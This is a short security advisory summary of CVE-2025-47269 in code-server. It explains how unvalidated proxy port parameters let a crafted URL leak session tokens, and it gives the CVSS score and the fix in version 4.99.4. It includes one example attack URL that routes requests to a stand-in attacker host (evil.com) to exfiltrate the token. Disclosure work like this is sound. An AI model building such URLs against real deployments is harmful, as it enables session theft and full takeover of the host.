CVE-2025-47269: 
JavaScript vulnerability analysis and mitigation

A critical security vulnerability (CVE-2025-47269) was discovered in code-server, a tool that runs VS Code on any machine through browser access. The vulnerability was disclosed on May 9, 2025, affecting versions prior to 4.99.4. The issue stems from improper validation of proxy requests, allowing malicious actors to gain unauthorized access to session tokens (GitHub Advisory).

The vulnerability occurs due to insufficient validation of port parameters in proxy requests. When a maliciously crafted URL using the proxy subpath is accessed (e.g., https:///proxy/test@evil.com/path), the request gets proxied to test@evil.com/path, enabling the attacker to exfiltrate the user's session token. The vulnerability has been assigned a CVSS v3.1 score of 8.3 (High), with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L (GitHub Advisory).

The vulnerability affects users running code-server with the built-in proxy enabled. If exploited, attackers can gain full access to the machine hosting code-server with the same privileges as the user running code-server. This is achieved through the exfiltration of session cookies, which allows unauthorized login to the code-server instance (GitHub Advisory).

The vulnerability has been patched in code-server version 4.99.4. The fix includes validation that ports in the path proxy are numbers, preventing proxying to arbitrary domains. Users are strongly advised to upgrade to version 4.99.4 or later to mitigate this security risk (GitHub Release).

The release of the patch received positive community feedback, with multiple GitHub users reacting positively to the security fix. The community response included thumbs up, hooray, heart, and rocket reactions from various users, indicating strong support for the security update (GitHub Release).